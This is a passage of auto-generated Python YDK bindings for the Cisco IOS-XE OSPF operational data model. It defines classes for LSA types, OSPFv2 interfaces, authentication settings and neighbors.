                        self._segment_path = lambda: "external-lsa"
                        # Must be assigned last: freezes the instance for validated writes.
                        self._is_frozen = True
                    def __setattr__(self, name, value):
                        self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.ExternalLsa, ['external_lsa_mask'], name, value)
                    class ExternalTopo(Entity):
                        """YDK binding for the external-topo list node under external-lsa."""
                        _prefix = 'ospf-ios-xe-oper'
                        _revision = '2018-02-01'
                        def __init__(self):
                            super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.ExternalLsa.ExternalTopo, self).__init__()
                            self.yang_name = "external-topo"
                            self.yang_parent_name = "external-lsa"
                            self.is_top_level_class = False
                            self.has_list_ancestor = True
                            self.ylist_key_names = []
                            self._child_classes = OrderedDict([])
                            self._leafs = OrderedDict([
                                ('mt_id', (YLeaf(YType.uint8, 'mt-id'), ['int'])),
                                ('topo_metric_type', (YLeaf(YType.enumeration, 'topo-metric-type'), [('ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper', 'OspfExternalMetricType', '')])),
                                ('topo_metric', (YLeaf(YType.uint32, 'topo-metric'), ['int'])),
                                ('topo_forwarding_address', (YLeaf(YType.str, 'topo-forwarding-address'), ['str','str'])),
                                ('topo_route_tag', (YLeaf(YType.uint32, 'topo-route-tag'), ['int'])),
                            ])
                            self.mt_id = None
                            self.topo_metric_type = None
                            self.topo_metric = None
                            self.topo_forwarding_address = None
                            self.topo_route_tag = None
                            self._segment_path = lambda: "external-topo"
                            self._is_frozen = True
                        def __setattr__(self, name, value):
                            self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.ExternalLsa.ExternalTopo, ['mt_id', 'topo_metric_type', 'topo_metric', 'topo_forwarding_address', 'topo_route_tag'], name, value)
                class NssaLsa(Entity):
                    """YDK binding for the nssa-lsa container under ospfv2-lsdb-area."""
                    _prefix = 'ospf-ios-xe-oper'
                    _revision = '2018-02-01'
                    def __init__(self):
                        super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NssaLsa, self).__init__()
                        self.yang_name = "nssa-lsa"
                        self.yang_parent_name = "ospfv2-lsdb-area"
                        self.is_top_level_class = False
                        self.has_list_ancestor = True
                        self.ylist_key_names = []
                        self._child_classes = OrderedDict([("external-topo", ("external_topo", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NssaLsa.ExternalTopo))])
                        self._leafs = OrderedDict([
                            ('external_lsa_mask', (YLeaf(YType.uint32, 'external-lsa-mask'), ['int'])),
                        ])
                        self.external_lsa_mask = None
                        # YANG list of child external-topo entries.
                        self.external_topo = YList(self)
                        self._segment_path = lambda: "nssa-lsa"
                        # Must be assigned last: freezes the instance for validated writes.
                        self._is_frozen = True
                    def __setattr__(self, name, value):
                        self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NssaLsa, ['external_lsa_mask'], name, value)
                    class ExternalTopo(Entity):
                        """YDK binding for the external-topo list node under nssa-lsa."""
                        _prefix = 'ospf-ios-xe-oper'
                        _revision = '2018-02-01'
                        def __init__(self):
                            super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NssaLsa.ExternalTopo, self).__init__()
                            self.yang_name = "external-topo"
                            self.yang_parent_name = "nssa-lsa"
                            self.is_top_level_class = False
                            self.has_list_ancestor = True
                            self.ylist_key_names = []
                            self._child_classes = OrderedDict([])
                            self._leafs = OrderedDict([
                                ('mt_id', (YLeaf(YType.uint8, 'mt-id'), ['int'])),
                                ('topo_metric_type', (YLeaf(YType.enumeration, 'topo-metric-type'), [('ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper', 'OspfExternalMetricType', '')])),
                                ('topo_metric', (YLeaf(YType.uint32, 'topo-metric'), ['int'])),
                                ('topo_forwarding_address', (YLeaf(YType.str, 'topo-forwarding-address'), ['str','str'])),
                                ('topo_route_tag', (YLeaf(YType.uint32, 'topo-route-tag'), ['int'])),
                            ])
                            self.mt_id = None
                            self.topo_metric_type = None
                            self.topo_metric = None
                            self.topo_forwarding_address = None
                            self.topo_route_tag = None
                            self._segment_path = lambda: "external-topo"
                            self._is_frozen = True
                        def __setattr__(self, name, value):
                            self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NssaLsa.ExternalTopo, ['mt_id', 'topo_metric_type', 'topo_metric', 'topo_forwarding_address', 'topo_route_tag'], name, value)
            class Ospfv2Interface(Entity):
                """
                YDK binding for the ospfv2-interface list node (keyed by 'name')
                under ospfv2-area. Carries per-interface OSPFv2 state plus child
                containers ttl-security-val and auth-val and the ospfv2-neighbor list.
                """
                _prefix = 'ospf-ios-xe-oper'
                _revision = '2018-02-01'
                def __init__(self):
                    super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface, self).__init__()
                    self.yang_name = "ospfv2-interface"
                    self.yang_parent_name = "ospfv2-area"
                    self.is_top_level_class = False
                    self.has_list_ancestor = True
                    # 'name' is the YANG list key; it also appears in the segment path below.
                    self.ylist_key_names = ['name']
                    self._child_classes = OrderedDict([("ttl-security-val", ("ttl_security_val", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.TtlSecurityVal)), ("auth-val", ("auth_val", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.AuthVal)), ("ospfv2-neighbor", ("ospfv2_neighbor", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.Ospfv2Neighbor))])
                    # _leafs maps Python attribute name -> (YLeaf descriptor, accepted Python types).
                    self._leafs = OrderedDict([
                        ('name', (YLeaf(YType.str, 'name'), ['str'])),
                        ('network_type', (YLeaf(YType.enumeration, 'network-type'), [('ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper', 'OspfNetworkType', '')])),
                        ('enable', (YLeaf(YType.boolean, 'enable'), ['bool'])),
                        ('passive', (YLeaf(YType.boolean, 'passive'), ['bool'])),
                        ('demand_circuit', (YLeaf(YType.boolean, 'demand-circuit'), ['bool'])),
                        ('mtu_ignore', (YLeaf(YType.boolean, 'mtu-ignore'), ['bool'])),
                        ('prefix_suppresion', (YLeaf(YType.boolean, 'prefix-suppresion'), ['bool'])),
                        ('cost', (YLeaf(YType.uint16, 'cost'), ['int'])),
                        ('hello_interval', (YLeaf(YType.uint16, 'hello-interval'), ['int'])),
                        ('dead_interval', (YLeaf(YType.uint16, 'dead-interval'), ['int'])),
                        ('retransmit_interval', (YLeaf(YType.uint16, 'retransmit-interval'), ['int'])),
                        ('transmit_delay', (YLeaf(YType.uint16, 'transmit-delay'), ['int'])),
                        ('hello_timer', (YLeaf(YType.uint32, 'hello-timer'), ['int'])),
                        ('wait_timer', (YLeaf(YType.uint32, 'wait-timer'), ['int'])),
                        ('dr', (YLeaf(YType.uint32, 'dr'), ['int'])),
                        ('bdr', (YLeaf(YType.uint32, 'bdr'), ['int'])),
                        ('dr_ip', (YLeaf(YType.str, 'dr-ip'), ['str','str'])),
                        ('bdr_ip', (YLeaf(YType.str, 'bdr-ip'), ['str','str'])),
                        ('state', (YLeaf(YType.enumeration, 'state'), [('ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper', 'Ospfv2IntfState', '')])),
                    ])
                    self.name = None
                    self.network_type = None
                    self.enable = None
                    self.passive = None
                    self.demand_circuit = None
                    self.mtu_ignore = None
                    self.prefix_suppresion = None
                    self.cost = None
                    self.hello_interval = None
                    self.dead_interval = None
                    self.retransmit_interval = None
                    self.transmit_delay = None
                    self.hello_timer = None
                    self.wait_timer = None
                    self.dr = None
                    self.bdr = None
                    self.dr_ip = None
                    self.bdr_ip = None
                    self.state = None
                    # Child containers are instantiated eagerly and parented to self.
                    self.ttl_security_val = OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.TtlSecurityVal()
                    self.ttl_security_val.parent = self
                    self._children_name_map["ttl_security_val"] = "ttl-security-val"
                    self.auth_val = OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.AuthVal()
                    self.auth_val.parent = self
                    self._children_name_map["auth_val"] = "auth-val"
                    self.ospfv2_neighbor = YList(self)
                    self._segment_path = lambda: "ospfv2-interface" + "[name='" + str(self.name) + "']"
                    # Must be assigned last: freezes the instance for validated writes.
                    self._is_frozen = True
                def __setattr__(self, name, value):
                    self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface, ['name', 'network_type', 'enable', 'passive', 'demand_circuit', 'mtu_ignore', 'prefix_suppresion', 'cost', 'hello_interval', 'dead_interval', 'retransmit_interval', 'transmit_delay', 'hello_timer', 'wait_timer', 'dr', 'bdr', 'dr_ip', 'bdr_ip', 'state'], name, value)
                class TtlSecurityVal(Entity):
                    """YDK binding for the ttl-security-val container under ospfv2-interface."""
                    _prefix = 'ospf-ios-xe-oper'
                    _revision = '2018-02-01'
                    def __init__(self):
                        super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.TtlSecurityVal, self).__init__()
                        self.yang_name = "ttl-security-val"
                        self.yang_parent_name = "ospfv2-interface"
                        self.is_top_level_class = False
                        self.has_list_ancestor = True
                        self.ylist_key_names = []
                        self._child_classes = OrderedDict([])
                        self._leafs = OrderedDict([
                            ('enable', (YLeaf(YType.boolean, 'enable'), ['bool'])),
                            ('hops', (YLeaf(YType.int32, 'hops'), ['int'])),
                        ])
                        self.enable = None
                        self.hops = None
                        self._segment_path = lambda: "ttl-security-val"
                        self._is_frozen = True
                    def __setattr__(self, name, value):
                        self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.TtlSecurityVal, ['enable', 'hops'], name, value)
                class AuthVal(Entity):
                    """YDK binding for the auth-val container (authentication settings) under ospfv2-interface."""
                    _prefix = 'ospf-ios-xe-oper'
                    _revision = '2018-02-01'
                    def __init__(self):
                        super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.AuthVal, self).__init__()
                        self.yang_name = "auth-val"
                        self.yang_parent_name = "ospfv2-interface"
                        self.is_top_level_class = False
                        self.has_list_ancestor = True
                        self.ylist_key_names = []
                        self._child_classes = OrderedDict([("auth-key", ("auth_key", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.AuthVal.AuthKey)), ("key-chain", ("key_chain", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.AuthVal.KeyChain))])
                        self._leafs = OrderedDict([
                            ('no_auth', (YLeaf(YType.uint32, 'no-auth'), ['int'])),
                        ])
                        self.no_auth = None
                        self.auth_key = OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.AuthVal.AuthKey()
                        self.auth_key.parent = self
                        self._children_name_map["auth_key"] = "auth-key"
                        self.key_chain = OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.AuthVal.KeyChain()
                        self.key_chain.parent = self
                        self._children_name_map["key_chain"] = "key-chain"
                        self._segment_path = lambda: "auth-val"
                        self._is_frozen = True
                    def __setattr__(self, name, value):
                        self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.AuthVal, ['no_auth'], name, value)
                    class AuthKey(Entity):
                        """YDK binding for the auth-key container under auth-val."""
                        _prefix = 'ospf-ios-xe-oper'
                        _revision = '2018-02-01'
                        def __init__(self):
                            super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.AuthVal.AuthKey, self).__init__()
                            self.yang_name = "auth-key"
                            self.yang_parent_name = "auth-val"
                            self.is_top_level_class = False
                            self.has_list_ancestor = True
                            self.ylist_key_names = []
                            self._child_classes = OrderedDict([])
                            self._leafs = OrderedDict([
                                ('key_id', (YLeaf(YType.uint8, 'key-id'), ['int'])),
                                ('key_string', (YLeafList(YType.uint8, 'key-string'), ['int'])),
                                ('crypto_algo', (YLeaf(YType.enumeration, 'crypto-algo'), [('ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper', 'Ospfv2CryptoAlgorithm', '')])),
                            ])
                            self.key_id = None
                            # leaf-list: holds a list of ints rather than a scalar.
                            self.key_string = []
                            self.crypto_algo = None
                            self._segment_path = lambda: "auth-key"
                            self._is_frozen = True
                        def __setattr__(self, name, value):
                            self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.AuthVal.AuthKey, ['key_id', 'key_string', 'crypto_algo'], name, value)
                    class KeyChain(Entity):
                        """YDK binding for the key-chain container under auth-val."""
                        _prefix = 'ospf-ios-xe-oper'
                        _revision = '2018-02-01'
                        def __init__(self):
                            super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.AuthVal.KeyChain, self).__init__()
                            self.yang_name = "key-chain"
                            self.yang_parent_name = "auth-val"
                            self.is_top_level_class = False
                            self.has_list_ancestor = True
                            self.ylist_key_names = []
                            self._child_classes = OrderedDict([])
                            self._leafs = OrderedDict([
                                ('key_chain', (YLeafList(YType.uint8, 'key-chain'), ['int'])),
                            ])
                            # leaf-list: holds a list of ints rather than a scalar.
                            self.key_chain = []
                            self._segment_path = lambda: "key-chain"
                            self._is_frozen = True
                        def __setattr__(self, name, value):
                            self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.AuthVal.KeyChain, ['key_chain'], name, value)
                class Ospfv2Neighbor(Entity):
                    """YDK binding for the ospfv2-neighbor list node (keyed by 'nbr-id') under ospfv2-interface."""
                    _prefix = 'ospf-ios-xe-oper'
                    _revision = '2018-02-01'
                    def __init__(self):
                        super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.Ospfv2Neighbor, self).__init__()
                        self.yang_name = "ospfv2-neighbor"
                        self.yang_parent_name = "ospfv2-interface"
                        self.is_top_level_class = False
                        self.has_list_ancestor = True
                        self.ylist_key_names = ['nbr_id']
                        self._child_classes = OrderedDict([])
                        self._leafs = OrderedDict([
                            ('nbr_id', (YLeaf(YType.uint32, 'nbr-id'), ['int'])),
                            ('address', (YLeaf(YType.str, 'address'), ['str','str'])),
                            ('dr', (YLeaf(YType.uint32, 'dr'), ['int'])),
                            ('bdr', (YLeaf(YType.uint32, 'bdr'), ['int'])),
                            ('dr_ip', (YLeaf(YType.str, 'dr-ip'), ['str','str'])),
                            ('bdr_ip', (YLeaf(YType.str, 'bdr-ip'), ['str','str'])),
                            ('event_count', (YLeaf(YType.uint32, 'event-count'), ['int'])),
                            ('retrans_count', (YLeaf(YType.uint32, 'retrans-count'), ['int'])),
                            ('state', (YLeaf(YType.enumeration, 'state'), [('ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper', 'NbrStateType', '')])),
                            ('dead_timer', (YLeaf(YType.uint32, 'dead-timer'), ['int'])),
                        ])
                        self.nbr_id = None
                        self.address = None
                        self.dr = None
                        self.bdr = None
                        self.dr_ip = None
                        self.bdr_ip = None
                        self.event_count = None
                        self.retrans_count = None
                        self.state = None
                        self.dead_timer = None
                        self._segment_path = lambda: "ospfv2-neighbor" + "[nbr-id='" + str(self.nbr_id) + "']"
                        self._is_frozen = True
                    def __setattr__(self, name, value):
                        self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.Ospfv2Neighbor, ['nbr_id', 'address', 'dr', 'bdr', 'dr_ip', 'bdr_ip', 'event_count', 'retrans_count', 'state', 'dead_timer'], name, value)
        class Ospfv2LsdbExternal(Entity):
            """
            YDK binding for the ospfv2-lsdb-external list node under
            ospfv2-instance, keyed by (lsa-type, lsa-id, advertising-router).
            Carries the common LSA header leafs plus one child container per
            LSA body variant and the ospfv2-router-lsa-links list.
            """
            _prefix = 'ospf-ios-xe-oper'
            _revision = '2018-02-01'
            def __init__(self):
                super(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal, self).__init__()
                self.yang_name = "ospfv2-lsdb-external"
                self.yang_parent_name = "ospfv2-instance"
                self.is_top_level_class = False
                self.has_list_ancestor = True
                # Composite YANG list key; all three appear in the segment path below.
                self.ylist_key_names = ['lsa_type','lsa_id','advertising_router']
                self._child_classes = OrderedDict([("ospfv2-router-lsa-links", ("ospfv2_router_lsa_links", OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.Ospfv2RouterLsaLinks)), ("unsupported-lsa", ("unsupported_lsa", OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.UnsupportedLsa)), ("router-lsa", ("router_lsa", OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.RouterLsa)), ("network-lsa", ("network_lsa", OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NetworkLsa)), ("network-summary-lsa", ("network_summary_lsa", OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NetworkSummaryLsa)), ("router-summary-lsa", ("router_summary_lsa", OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.RouterSummaryLsa)), ("external-lsa", ("external_lsa", OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.ExternalLsa)), ("nssa-lsa", ("nssa_lsa", OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NssaLsa))])
                # _leafs maps Python attribute name -> (YLeaf descriptor, accepted Python types).
                self._leafs = OrderedDict([
                    ('lsa_type', (YLeaf(YType.uint8, 'lsa-type'), ['int'])),
                    ('lsa_id', (YLeaf(YType.uint32, 'lsa-id'), ['int'])),
                    ('advertising_router', (YLeaf(YType.uint32, 'advertising-router'), ['int'])),
                    ('lsa_age', (YLeaf(YType.uint16, 'lsa-age'), ['int'])),
                    ('lsa_options', (YLeaf(YType.bits, 'lsa-options'), ['Bits'])),
                    ('lsa_seq_number', (YLeaf(YType.uint32, 'lsa-seq-number'), ['int'])),
                    ('lsa_checksum', (YLeaf(YType.uint16, 'lsa-checksum'), ['int'])),
                    ('lsa_length', (YLeaf(YType.uint16, 'lsa-length'), ['int'])),
                ])
                self.lsa_type = None
                self.lsa_id = None
                self.advertising_router = None
                self.lsa_age = None
                # bits leaf: modelled with a mutable Bits value rather than None.
                self.lsa_options = Bits()
                self.lsa_seq_number = None
                self.lsa_checksum = None
                self.lsa_length = None
                # Child containers are instantiated eagerly and parented to self.
                self.unsupported_lsa = OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.UnsupportedLsa()
                self.unsupported_lsa.parent = self
                self._children_name_map["unsupported_lsa"] = "unsupported-lsa"
                self.router_lsa = OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.RouterLsa()
                self.router_lsa.parent = self
                self._children_name_map["router_lsa"] = "router-lsa"
                self.network_lsa = OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NetworkLsa()
                self.network_lsa.parent = self
                self._children_name_map["network_lsa"] = "network-lsa"
                self.network_summary_lsa = OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NetworkSummaryLsa()
                self.network_summary_lsa.parent = self
                self._children_name_map["network_summary_lsa"] = "network-summary-lsa"
                self.router_summary_lsa = OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.RouterSummaryLsa()
                self.router_summary_lsa.parent = self
                self._children_name_map["router_summary_lsa"] = "router-summary-lsa"
                self.external_lsa = OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.ExternalLsa()
                self.external_lsa.parent = self
                self._children_name_map["external_lsa"] = "external-lsa"
                self.nssa_lsa = OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NssaLsa()
                self.nssa_lsa.parent = self
                self._children_name_map["nssa_lsa"] = "nssa-lsa"
                self.ospfv2_router_lsa_links = YList(self)
                self._segment_path = lambda: "ospfv2-lsdb-external" + "[lsa-type='" + str(self.lsa_type) + "']" + "[lsa-id='" + str(self.lsa_id) + "']" + "[advertising-router='" + str(self.advertising_router) + "']"
                # Must be assigned last: freezes the instance for validated writes.
                self._is_frozen = True
            def __setattr__(self, name, value):
                self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal, ['lsa_type', 'lsa_id', 'advertising_router', 'lsa_age', 'lsa_options', 'lsa_seq_number', 'lsa_checksum', 'lsa_length'], name, value)
            class Ospfv2RouterLsaLinks(Entity):
                """YDK binding for the ospfv2-router-lsa-links list node, keyed by (link-type, link-id, link-data)."""
                _prefix = 'ospf-ios-xe-oper'
                _revision = '2018-02-01'
                def __init__(self):
                    super(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.Ospfv2RouterLsaLinks, self).__init__()
                    self.yang_name = "ospfv2-router-lsa-links"
                    self.yang_parent_name = "ospfv2-lsdb-external"
                    self.is_top_level_class = False
                    self.has_list_ancestor = True
                    self.ylist_key_names = ['link_type','link_id','link_data']
                    self._child_classes = OrderedDict([("link-topo", ("link_topo", OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.Ospfv2RouterLsaLinks.LinkTopo))])
                    self._leafs = OrderedDict([
                        ('link_type', (YLeaf(YType.uint8, 'link-type'), ['int'])),
                        ('link_id', (YLeaf(YType.uint32, 'link-id'), ['int'])),
                        ('link_data', (YLeaf(YType.uint32, 'link-data'), ['int'])),
                    ])
                    self.link_type = None
                    self.link_id = None
                    self.link_data = None
                    self.link_topo = YList(self)
                    self._segment_path = lambda: "ospfv2-router-lsa-links" + "[link-type='" + str(self.link_type) + "']" + "[link-id='" + str(self.link_id) + "']" + "[link-data='" + str(self.link_data) + "']"
                    self._is_frozen = True
                def __setattr__(self, name, value):
                    self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.Ospfv2RouterLsaLinks, ['link_type', 'link_id', 'link_data'], name, value)
                class LinkTopo(Entity):
                    """YDK binding for the link-topo list node under ospfv2-router-lsa-links."""
                    _prefix = 'ospf-ios-xe-oper'
                    _revision = '2018-02-01'
                    def __init__(self):
                        super(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.Ospfv2RouterLsaLinks.LinkTopo, self).__init__()
                        self.yang_name = "link-topo"
                        self.yang_parent_name = "ospfv2-router-lsa-links"
                        self.is_top_level_class = False
                        self.has_list_ancestor = True
                        self.ylist_key_names = []
                        self._child_classes = OrderedDict([])
                        self._leafs = OrderedDict([
                            ('mt_id', (YLeaf(YType.uint8, 'mt-id'), ['int'])),
                            ('topo_metric', (YLeaf(YType.uint16, 'topo-metric'), ['int'])),
                        ])
                        self.mt_id = None
                        self.topo_metric = None
                        self._segment_path = lambda: "link-topo"
                        self._is_frozen = True
                    def __setattr__(self, name, value):
                        self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.Ospfv2RouterLsaLinks.LinkTopo, ['mt_id', 'topo_metric'], name, value)
            class UnsupportedLsa(Entity):
                """YDK binding for the unsupported-lsa container (raw lsa-data bytes as a leaf-list)."""
                _prefix = 'ospf-ios-xe-oper'
                _revision = '2018-02-01'
                def __init__(self):
                    super(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.UnsupportedLsa, self).__init__()
                    self.yang_name = "unsupported-lsa"
                    self.yang_parent_name = "ospfv2-lsdb-external"
                    self.is_top_level_class = False
                    self.has_list_ancestor = True
                    self.ylist_key_names = []
                    self._child_classes = OrderedDict([])
                    self._leafs = OrderedDict([
                        ('lsa_data', (YLeafList(YType.uint8, 'lsa-data'), ['int'])),
                    ])
                    # leaf-list: holds a list of ints rather than a scalar.
                    self.lsa_data = []
                    self._segment_path = lambda: "unsupported-lsa"
                    self._is_frozen = True
                def __setattr__(self, name, value):
                    self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.UnsupportedLsa, ['lsa_data'], name, value)
            class RouterLsa(Entity):
                """YDK binding for the router-lsa container under ospfv2-lsdb-external."""
                _prefix = 'ospf-ios-xe-oper'
                _revision = '2018-02-01'
                def __init__(self):
                    super(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.RouterLsa, self).__init__()
                    self.yang_name = "router-lsa"
                    self.yang_parent_name = "ospfv2-lsdb-external"
                    self.is_top_level_class = False
                    self.has_list_ancestor = True
                    self.ylist_key_names = []
                    self._child_classes = OrderedDict([])
                    self._leafs = OrderedDict([
                        ('router_lsa_bits', (YLeaf(YType.bits, 'router-lsa-bits'), ['Bits'])),
                        ('router_lsa_number_links', (YLeaf(YType.uint16, 'router-lsa-number-links'), ['int'])),
                    ])
                    # bits leaf: modelled with a mutable Bits value rather than None.
                    self.router_lsa_bits = Bits()
                    self.router_lsa_number_links = None
                    self._segment_path = lambda: "router-lsa"
                    self._is_frozen = True
                def __setattr__(self, name, value):
                    self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.RouterLsa, ['router_lsa_bits', 'router_lsa_number_links'], name, value)
            class NetworkLsa(Entity):
                """YDK binding for the network-lsa container under ospfv2-lsdb-external."""
                _prefix = 'ospf-ios-xe-oper'
                _revision = '2018-02-01'
                def __init__(self):
                    super(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NetworkLsa, self).__init__()
                    self.yang_name = "network-lsa"
                    self.yang_parent_name = "ospfv2-lsdb-external"
                    self.is_top_level_class = False
                    self.has_list_ancestor = True
                    self.ylist_key_names = []
                    self._child_classes = OrderedDict([])
                    self._leafs = OrderedDict([
                        ('network_lsa_mask', (YLeaf(YType.uint32, 'network-lsa-mask'), ['int'])),
                        ('network_attached_routers', (YLeafList(YType.uint32, 'network-attached-routers'), ['int'])),
                    ])
                    self.network_lsa_mask = None
                    # leaf-list: holds a list of ints rather than a scalar.
                    self.network_attached_routers = []
                    self._segment_path = lambda: "network-lsa"
                    self._is_frozen = True
                def __setattr__(self, name, value):
                    self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NetworkLsa, ['network_lsa_mask', 'network_attached_routers'], name, value)
            class NetworkSummaryLsa(Entity):
                """YDK binding for the network-summary-lsa container under ospfv2-lsdb-external."""
                _prefix = 'ospf-ios-xe-oper'
                _revision = '2018-02-01'
                def __init__(self):
                    super(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NetworkSummaryLsa, self).__init__()
                    self.yang_name = "network-summary-lsa"
                    self.yang_parent_name = "ospfv2-lsdb-external"
                    self.is_top_level_class = False
                    self.has_list_ancestor = True
                    self.ylist_key_names = []
                    self._child_classes = OrderedDict([("summary-topo", ("summary_topo", OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NetworkSummaryLsa.SummaryTopo))])
                    self._leafs = OrderedDict([
                        ('summary_lsa_mask', (YLeaf(YType.uint32, 'summary-lsa-mask'), ['int'])),
                    ])
                    self.summary_lsa_mask = None
                    self.summary_topo = YList(self)
                    self._segment_path = lambda: "network-summary-lsa"
                    self._is_frozen = True
                def __setattr__(self, name, value):
                    self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NetworkSummaryLsa, ['summary_lsa_mask'], name, value)
                class SummaryTopo(Entity):
                    """YDK binding for the summary-topo list node under network-summary-lsa."""
                    _prefix = 'ospf-ios-xe-oper'
                    _revision = '2018-02-01'
                    def __init__(self):
                        super(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NetworkSummaryLsa.SummaryTopo, self).__init__()
                        self.yang_name = "summary-topo"
                        self.yang_parent_name = "network-summary-lsa"
                        self.is_top_level_class = False
                        self.has_list_ancestor = True
                        self.ylist_key_names = []
                        self._child_classes = OrderedDict([])
                        self._leafs = OrderedDict([
                            ('mt_id', (YLeaf(YType.uint8, 'mt-id'), ['int'])),
                            ('topo_metric', (YLeaf(YType.uint32, 'topo-metric'), ['int'])),
                        ])
                        self.mt_id = None
                        self.topo_metric = None
                        self._segment_path = lambda: "summary-topo"
                        self._is_frozen = True
                    def __setattr__(self, name, value):
                        self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NetworkSummaryLsa.SummaryTopo, ['mt_id', 'topo_metric'], name, value)
            class RouterSummaryLsa(Entity):
                """YDK binding for the router-summary-lsa container under ospfv2-lsdb-external."""
                _prefix = 'ospf-ios-xe-oper'
                _revision = '2018-02-01'
                def __init__(self):
                    super(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.RouterSummaryLsa, self).__init__()
                    self.yang_name = "router-summary-lsa"
                    self.yang_parent_name = "ospfv2-lsdb-external"
                    self.is_top_level_class = False
                    self.has_list_ancestor = True
                    self.ylist_key_names = []
                    self._child_classes = OrderedDict([("summary-topo", ("summary_topo", OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.RouterSummaryLsa.SummaryTopo))])
                    self._leafs = OrderedDict([
                        ('summary_lsa_mask', (YLeaf(YType.uint32, 'summary-lsa-mask'), ['int'])),
                    ])
                    self.summary_lsa_mask = None
                    self.summary_topo = YList(self)
                    self._segment_path = lambda: "router-summary-lsa"
                    self._is_frozen = True
                def __setattr__(self, name, value):
                    self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.RouterSummaryLsa, ['summary_lsa_mask'], name, value)
                class SummaryTopo(Entity):
                    """YDK binding for the summary-topo list node under router-summary-lsa."""
                    _prefix = 'ospf-ios-xe-oper'
                    _revision = '2018-02-01'
                    def __init__(self):
                        super(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.RouterSummaryLsa.SummaryTopo, self).__init__()
                        self.yang_name = "summary-topo"
                        self.yang_parent_name = "router-summary-lsa"
                        self.is_top_level_class = False
                        self.has_list_ancestor = True
                        self.ylist_key_names = []
                        self._child_classes = OrderedDict([])
                        self._leafs = OrderedDict([
                            ('mt_id', (YLeaf(YType.uint8, 'mt-id'), ['int'])),
                            ('topo_metric', (YLeaf(YType.uint32, 'topo-metric'), ['int'])),
                        ])
                        self.mt_id = None
                        self.topo_metric = None
                        self._segment_path = lambda: "summary-topo"
                        self._is_frozen = True
                    def __setattr__(self, name, value):
